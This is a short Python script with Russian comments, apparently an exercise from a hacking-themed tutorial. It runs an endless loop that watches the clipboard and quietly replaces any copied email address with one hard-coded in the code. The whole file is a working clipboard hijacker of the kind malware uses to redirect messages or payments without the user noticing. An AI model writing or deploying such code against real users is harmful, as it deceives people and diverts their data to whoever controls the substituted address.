"""
Напиши программу, 
которая в цикле мониторит буфер обмена, 
периодически получая из него текст 
с помощью pyperclip.paste(), и, если видит, 
что кем‑то был скопирован email, 
заменяет этот email другим, 
заранее прописанным в коде, помещая его 
в буфер обмена командой 
pyperclip.copy('coolhacker@xakep.ru')
"""
# Подключим модуль для работы с буфером обмена
import pyperclip
# Подключим модуль для работы с системным временем
import time
# Задаем переменную old и присваиваем ей пустую строку
old = ''
email = 'nikolai@xakep.ru'
# Начнем бесконечный цикл слежения за буфером обмена
while True:
    # Кладем в переменную s содержимое буфера обмена
    s = pyperclip.paste()
    # Если полученное содержимое не равно предыдущему, то:
    if(s != old):
        # печатаем его
        for i in s:
            if i == '@':
                pyperclip.copy(email)
        # в переменную old записываем текущее пойманное значение
        # чтобы в следующий виток цикла не повторяться и не печатать то, что уже поймано
        old = s
    # В конце витка цикла делаем паузу в одну секунду, чтобы содержимое буфера обмена успело прогрузиться
    time.sleep(1)
